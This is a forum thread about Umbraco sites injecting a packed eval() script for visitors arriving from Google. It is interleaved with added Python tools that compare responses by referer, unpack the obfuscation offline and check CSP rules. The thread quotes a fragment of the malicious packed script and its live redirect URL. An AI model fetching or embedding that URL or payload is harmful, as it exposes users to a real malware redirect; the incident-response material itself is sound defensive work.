Umbraco site Hacked
Hi, I have two Umbraco websites which appear to have been hacked. JavaScript is injected when visiting only certain URLs from Google. When viewing the page source by not coming through Google there is no JavaScript injected. I have checked all template files, and there is nothing in there. I have even wiped all code from the pages concerned, so only a blank page is available to be rendered, but the script is still injected when the web request comes from Google. We have completed virus and malware scans, but all are clear. Does anyone know what else we could check to find the injected script please? Thank you in advance.
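A way to pin the symptom down before anyone guesses at the cause (an added example written for this thread, not code from the original post or from Umbraco): because the page was emptied and the script still appears only for visitors coming from Google, the decision is being made per request, somewhere on the server or on the network path. The script below fetches the same URL with and without a Google Referer header, lists every script element that exists only in the suspect response, and flags the Dean Edwards "p,a,c,k,e,r" wrapper. The Referer and User-Agent strings are assumptions, the attacker's real trigger condition is unknown, and the two HTML documents at the bottom are constructed samples so the comparison can be run offline.

```python
import re
import urllib.request
from html.parser import HTMLParser

# Assumed trigger values; the real condition the injector checks is not known from the thread.
GOOGLE_REFERER = "https://www.google.com/"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/120.0"

# Start of the p,a,c,k,e,r bootstrap (last parameter is r or d depending on packer version).
PACKER_SIGNATURE = re.compile(r"eval\(function\(p,a,c,k,e,[rd]\)")


def fetch(url, referer=None, user_agent=BROWSER_UA, timeout=15):
    """Fetch url with an optional Referer header and return the body as text (needs network)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    if referer:
        req.add_header("Referer", referer)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


class _ScriptCollector(HTMLParser):
    """Collects every <script> as 'src:<url>' or 'inline:<body>' in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._chunks = []

    def handle_data(self, data):
        if self._in_script:
            self._chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._chunks).strip()
            self.scripts.append("src:" + self._src if self._src else "inline:" + body)
            self._in_script = False


def extract_scripts(html):
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    return collector.scripts


def injected_scripts(baseline_html, suspect_html):
    """Scripts present in the suspect response but absent from the baseline response."""
    baseline = set(extract_scripts(baseline_html))
    return [s for s in extract_scripts(suspect_html) if s not in baseline]


def looks_packed(script):
    return bool(PACKER_SIGNATURE.search(script))


def compare_referers(url, referers=(None, GOOGLE_REFERER)):
    """Fetch url once per referer (None = no Referer header); report scripts that only
    appear when that referer is sent. Live check against the site under investigation."""
    baseline = fetch(url, referer=referers[0])
    return {ref: injected_scripts(baseline, fetch(url, referer=ref)) for ref in referers[1:]}


# Constructed samples: the blanked page as served without, and with, a Google referrer.
CLEAN_HTML = (
    '<html><head><script src="/scripts/site.js"></script></head>'
    "<body><h1>Blank page</h1></body></html>"
)
TAMPERED_HTML = CLEAN_HTML.replace(
    "</body>",
    "<script>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    "+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};/* rest of bootstrap omitted */"
    "return p}('',62,0,''.split('|'),0,{}))</script></body>",
)

if __name__ == "__main__":
    for script in injected_scripts(CLEAN_HTML, TAMPERED_HTML):
        print("injected:", script[:60], "(packed)" if looks_packed(script) else "")
```

Run compare_referers against the affected URL from a machine outside the hosting network; if the script shows up only with the Referer set, repeat the fetch from a host inside the hosting environment (or against the Kestrel port behind IIS, if reachable) to tell a server-side injector from something on the path in front of it. Scripts loaded by other scripts at runtime are not visible to this static comparison.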
From what you are saying, it sounds like you are suggesting there could be a bug with the Umbraco you are using.
What version of Umbraco 9 are you using? When you say hacked do you mean the entire site has been compromised (as in access to the database) or just a page is rendering with content you have no control over? Have you also tried a different browser? Is there any way this can be replicated against a local site?
Thanks
We are using version 10.2.1. It is only when certain pages are visited from a link on Google. I can’t recreate the redirect from the website navigation directly.
No I can’t replicate it locally.
Thank you
We have found this script being sent back: eval(function(p,a,c,k,e,r){e=function(c){return(c
redirecting people to https://br.zmdesf.cn/br.js
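The fragment quoted above is the start of the Dean Edwards "p,a,c,k,e,r" bootstrap, and the redirect target is the kind of thing that falls out of decoding it without ever running it. The decoder below is an added example for this thread (not code from the original post or from Umbraco): it pulls the packer's argument list (payload, radix, word count, word list) out of the eval wrapper, inverts the packer's base-N token encoding, and substitutes the dictionary words back. The payload is not on this page, so the packed sample at the bottom is constructed for the example and decodes to a script that points at the made-up host example.invalid. Radixes above 62 use a different alphabet and are not handled.

```python
import re

# Argument list the packer appends to its bootstrap:
#   }('<payload>',<radix>,<count>,'<w0>|<w1>|...'.split('|'),0,{})
_PACKER_ARGS = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)",
    re.S,
)


def _unescape_js_single_quoted(text):
    # The packer only produces \' and \\ inside its single-quoted payload; leave other escapes alone.
    return re.sub(r"\\(['\\])", r"\1", text)


def _decode_index(token, radix):
    """Inverse of the packer's e(c): digits 0-9, then a-z for 10..35, then A-Z for 36..61."""
    value = 0
    for ch in token:
        if "0" <= ch <= "9":
            digit = ord(ch) - ord("0")
        elif "a" <= ch <= "z":
            digit = ord(ch) - ord("a") + 10
        elif "A" <= ch <= "Z":
            digit = ord(ch) - ord("A") + 36
        else:
            return None
        if digit >= radix:
            return None
        value = value * radix + digit
    return value


def unpack(packed):
    """Return the source the packed eval(...) would have executed, without executing it."""
    m = _PACKER_ARGS.search(packed)
    if not m:
        raise ValueError("no p,a,c,k,e,r argument list found")
    payload = _unescape_js_single_quoted(m.group(1))
    radix, count = int(m.group(2)), int(m.group(3))
    words = _unescape_js_single_quoted(m.group(4)).split("|")
    if radix > 62:
        raise ValueError("radix above 62 uses the high-ASCII alphabet, not handled here")

    def restore(match):
        token = match.group(0)
        index = _decode_index(token, radix)
        # Tokens outside the dictionary, or mapped to an empty word, are left untouched by the packer too.
        if index is None or index >= count or index >= len(words) or not words[index]:
            return token
        return words[index]

    return re.sub(r"\b\w+\b", restore, payload)


def script_urls(code):
    """URLs referenced by the decoded script, for blocklists and log searches."""
    return re.findall(r"https?://[^\s'\"<>()]+", code)


# Constructed sample (same wrapper as the fragment in the thread, made-up payload and words).
PACKED_SAMPLE = (
    "eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    "+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    "if(!''.replace(/^/,String)){while(c--){r[e(c)]=k[c]||e(c)}"
    "k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};"
    "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}"
    "return p}('2 0=1.3(\\'4\\');0.5=\\'6://7.8/9.a\\';1.b.c(0);',62,13,"
    "'s|document|var|createElement|script|src|https|example|invalid|x|js|head|appendChild'"
    ".split('|'),0,{}))"
)

if __name__ == "__main__":
    decoded = unpack(PACKED_SAMPLE)
    print(decoded)
    print("contacts:", script_urls(decoded))
```

Decode the captured response offline like this rather than pasting it into a browser console; the decoded text may itself contain a second packed or otherwise obfuscated layer, in which case feed it back through unpack.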
Any chance you could update your site to the later version of Umbraco 10? 10.7 being the latest to see if the issue remains?
Not easily, it is a live website. But do you think this would fix it?
Thank you
I can't say yes for definite but that would be the first action to take.
The Umbraco guys do visit this forum so if it is a security concern they would act on it fast however they too may ask you to update to the latest version in case it's a known vulnerability and already addressed.
I have upgraded to version 10.7, but unfortunately this hasn't helped.
Is your site behind a CDN?
Could it be possible that a redirect has been intercepted and then cached in the CDN and is not actually hitting the site at all?
No, unfortunately we don't use a CDN.
It could be worth putting a CSP in place in case the issue is that one of your third party scripts has been compromised and is injecting the untrusted JavaScript.
There are limited ways that erroneous JavaScript can get into your site:
Umbraco back office user was compromised and that user's permissions have the ability to edit views/partial views / add scripts to pages via the content section. - All back office user accounts should reset their passwords.
Hosting environment has been compromised and accessed directly and the views updated from there - speak to your hosting provider and see if they can identify direct access.
Existing 3rd party JavaScript has been compromised - having a CSP would help protect against this (not 100% but pretty good).
CDN/Domain traffic interception is occurring - much harder to detect.
Also, have you confirmed that your site is running on HTTPS with a valid certificate and has things like HSTS enabled, which should decrease the ability for someone to browse the site on HTTP and have the traffic intercepted?
Thanks
Nik
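A CSP only helps here if its script-src actually excludes what was injected, and the injected code in this thread is an inline eval() block, which needs both inline execution and 'unsafe-eval' to be permitted. The checker below is an added example written for this thread (not from the original post or from Umbraco): it parses a Content-Security-Policy header, decides whether a given script URL would be allowed to load on a given page, and whether an attacker-injected inline eval() would run. It is a simplified matcher (paths in host-sources are ignored and a host-source without a scheme accepts http and https). The page URL, the weak and strict policies and the cdn.example.com host are assumptions; the script URL is the one reported earlier in the thread and is only compared, never fetched.

```python
from urllib.parse import urlparse


def parse_csp(header):
    """Split a Content-Security-Policy header into {directive: [source expressions]}.
    The first occurrence of a directive wins, as in browsers."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def _host_matches(pattern, host):
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return host == pattern


def _source_matches(expr, url, page):
    """Simplified CSP source-expression match for a script URL (assumption: paths ignored,
    schemeless host-sources accept http and https)."""
    expr = expr.lower()
    if expr == "'self'":
        return (url.scheme, url.hostname, url.port) == (page.scheme, page.hostname, page.port)
    if expr.startswith("'"):  # 'none', 'unsafe-*', nonces and hashes never match a URL
        return False
    if expr == "*":
        return url.scheme in ("http", "https")
    if expr.endswith(":") and "/" not in expr:  # scheme-source such as https:
        return url.scheme + ":" == expr
    scheme, _, rest = expr.rpartition("://")
    if scheme and scheme != url.scheme:
        return False
    host, _, port = rest.split("/", 1)[0].partition(":")
    effective_port = str(url.port or {"http": 80, "https": 443}.get(url.scheme))
    if port and port != "*" and port != effective_port:
        return False
    return _host_matches(host, url.hostname or "")


def script_src_sources(policy):
    directives = parse_csp(policy)
    if "script-src" in directives:
        return directives["script-src"]
    return directives.get("default-src")  # script-src falls back to default-src


def script_allowed(policy, script_url, page_url):
    """Would the browser load script_url on page_url under this policy?"""
    sources = script_src_sources(policy)
    if sources is None:
        return True  # the policy does not govern scripts at all
    url, page = urlparse(script_url), urlparse(page_url)
    return any(_source_matches(s, url, page) for s in sources)


def injected_inline_eval_allowed(policy):
    """Would an attacker-injected <script>eval(...)</script> run? It carries no nonce or hash,
    so it needs 'unsafe-inline' (which browsers ignore once a nonce or hash is listed),
    and the eval() call additionally needs 'unsafe-eval'."""
    sources = script_src_sources(policy)
    if sources is None:
        return True
    lowered = [s.lower() for s in sources]
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in lowered
    )
    inline_ok = "'unsafe-inline'" in lowered and not has_nonce_or_hash
    return inline_ok and "'unsafe-eval'" in lowered


# Assumed page and policies; the script URL is the one reported in the thread.
PAGE = "https://www.example.com/some-landing-page"
INJECTED = "https://br.zmdesf.cn/br.js"
PERMISSIVE = "script-src * 'unsafe-inline' 'unsafe-eval'"
STRICT = "default-src 'self'; script-src 'self' https://cdn.example.com; object-src 'none'; base-uri 'self'"

if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE), ("strict", STRICT)):
        print(name, "loads injected URL:", script_allowed(policy, INJECTED, PAGE),
              "| inline eval runs:", injected_inline_eval_allowed(policy))
```

On a live site, ship the strict policy first as Content-Security-Policy-Report-Only with a report-uri or report-to endpoint: nothing is blocked, but the reports show exactly which script sources the pages are pulling in, including the injected one, before the enforcing header goes out.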
Adding to the previous answer:
Since you know what the offending code is, it would be worth trying to search for it in the production website files. This would give you a hint as to whether it's a hosting environment / Umbraco backoffice compromise or some other cause.
If you do find the code inside one or more of your views, for example, there is a high chance someone has the ability to access the actual files, either from the Umbraco backoffice or from the hosting environment. So changing backoffice users' passwords and ensuring that the hosting environment doesn't allow any other technologies to be used (like classic ASP, PHP and so forth) can provide you some kind of increased security there.
If it's not in the files, maybe it would be worth minimizing the attack surface by swapping CDN calls to JS files with local calls (get the files on your hosting environment's filesystem and use them from there).
I have searched everywhere, and can't find the code.
Yes I have swapped the CDN calls to all local files in case this was where the issue was coming from, but unfortunately this hasn't resolved it either.
It seems so well hidden. The only additional piece of information I seem to have spotted is that when it is in the process of injecting the script, it briefly has an error saying resource not found.
Thank you so much for all your suggestions.
Hi Katie,
Are you absolutely sure the URLs from Google are on your site, and not a spoofed site with very similar-looking URLs?
Seems a bit strange that only when visiting from Google (of all places) the scripts are injected...
/Chriztian
Yes, it is so odd. This is why I just can't work it out. This is the code they seem to be injecting:
Hi Katie,
If you send me an email I will see how I can help you out!
Kind regards,
Jeffrey
I have also been getting this on an Umbraco 7 site and earlier Umbraco 8 sites. Has anyone worked out how to get rid of it?
The Umbraco 8 site, I have upgraded to 8.18, which seems to have solved it for now.
Do you have any third party JS libraries? Google Tag Manager or anything like that? If your GTM container has been hacked they could have injected it there.
If you view the source of the page, is it already there or does it appear later?
I would guess something is injecting it in via JS. Try stripping all JS references and add them back one by one.